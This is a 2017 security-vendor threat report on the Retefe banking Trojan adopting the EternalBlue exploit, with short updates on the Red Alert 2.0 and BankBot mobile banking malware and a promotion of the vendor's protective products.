Retefe Banking Malware Starts Leveraging EternalBlue

September 28, 2017

bank trojanA recent upgrade in the propagation capabilities of the Retefe banking Trojan (detected by Trend Micro as TROJ_RETEFE.ASUAN), as well as a few other developments in the banking malware landscape this month, shows how malware developers are ramping up their operations.

A recent report details how the developers behind Retefe added a new functionality to the malware that leverages EternalBlue (addressed by MS17-010), an infamous exploit connected to WannaCry and Petya ransomware attacks. Retefe is not the first banking Trojan to upgrade its propagation techniques—TrickBot and Emotet also took inspiration from the WannaCry and Petya outbreaks.

Security researchers noted that this new spate of Retefe campaigns has been spreading across different regions over the past few months. Typically this malware targets users in Austria, Sweden, Switzerland, Japan and recently the United Kingdom. The malware is distributed by malicious emails with “.lnk” shortcuts. If the attachment is opened and permission is given, a PowerShell command is triggered to download a self-extracting archive hosted on a remote server. Within the archive is an obfuscated JavaScript installer that implements the EternalBlue exploit, Eternal Blue then downloads a PowerShell script which installs Retefe. Most other banking Trojans use fake login pages on top of legitimate sites to steal credentials, but Retefe works by modifying the computer’s proxy settings and redirecting traffic to malicious sites hosted on remote servers.

Reports note that on September 20, the implementation of EternalBlue was modified and the module responsible for lateral spreading was removed, “thus avoiding an infinite spreading loop”.

This month’s banking malware landscape

Early this month, a new banking Trojan called Red Alert 2.0 was also ramping up operations and spreading through third-party app stores. This particular malware targets banking and social apps. Once installed, it uses an overlay to steal user credentials that it passes to a remote server. Red Alert 2.0 also blocks incoming calls from banks, presumably to block verification attempts and notifications.

This month also saw the BankBot malware updated. This malware is quite similar to Red Alert: it uses fake overlay screens to steal user credentials and is also capable of hijacking and intercepting SMS messages. Another consequence is that the malware can bypass SMS-based 2-factor authentication. The newer BankBot targets legitimate apps from banks based in 27 different countries, and ten United Arab Emirates (UAE) banking apps were added to their list.

Cybercriminals are constantly developing and adding functionality to their malware, and users should be equally vigilant. EternalBlue is a known exploit, and a patch has been available since March 2017. Users can stay protected by keeping their operating systems updated and using multilayered solutions.

Email and web gateway solutions such as Trend Micro™ Deep Discovery™ Email Inspector and InterScan™ Web Security can prevent malware from ever reaching end users. At the endpoint level, Trend Micro Smart Protection Suites deliver several capabilities like high fidelity machine learning, web reputation services, behavior monitoring, and application control, and vulnerability shielding that minimize the impact of this threat. Trend Micro Endpoint Sensor will also be effective in monitoring processes or events that trigger malicious activity.

Trend Micro™ Deep Discovery™ Inspector can detect connections to malicious C&C and help quickly identify the impacted machines on networks, while Trend Micro™ Deep Security™ can stop MS17-010 exploits from the network through its IPS technology.

For small businesses, Trend Micro Worry-Free Services Advanced offers cloud-based email gateway security through Hosted Email Security. Its endpoint protection also delivers several capabilities such as behavior monitoring and real-time web reputation in order detect and block ransomware.

All solutions are powered by XGen™ endpoint security, which infuses high-fidelity machine learning with other detection technologies and global threat intelligence for comprehensive protection against advanced malware.

HIDE

Like it? Add this infographic to your site:
1. Click on the box below.   2. Press Ctrl+A to select all.   3. Press Ctrl+C to copy.   4. Paste the code into your page (Ctrl+V).

Image will appear the same size as you see above.